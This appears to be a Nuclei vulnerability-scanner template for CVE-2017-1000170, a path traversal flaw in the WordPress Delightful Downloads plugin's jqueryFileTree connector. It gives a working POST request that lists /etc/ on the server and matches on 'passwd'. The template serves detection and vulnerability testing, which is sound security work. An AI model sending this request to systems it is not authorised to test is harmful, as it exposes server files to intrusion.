id: CVE-2017-1000170 info: name: WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion author: dwisiswant0 severity: high description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree. remediation: | Update to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor. reference: - https://www.exploit-db.com/exploits/49693 - https://github.com/jqueryfiletree/jqueryfiletree/issues/66 - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2017-1000170 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-1000170 cwe-id: CWE-22 epss-score: 0.70305 epss-percentile: 0.97669 cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jqueryfiletree_project product: jqueryfiletree tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm http: - method: POST path: - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" body: "dir=%2Fetc%2F&onlyFiles=true" matchers-condition: and matchers: - type: word part: body words: - "
  • " - "passwd
  • " condition: and - type: status status: - 200 # digest: 4a0a00473045022016116d772705a276c34480c0f9627376e52e7eda6bb5995cfb901c2efd1841d2022100d68242df604b1cb72ff4f31bcf3995befc0f90226bd7a36dc890282eb3fc3364:922c64590222798bb761d5b6d8e72950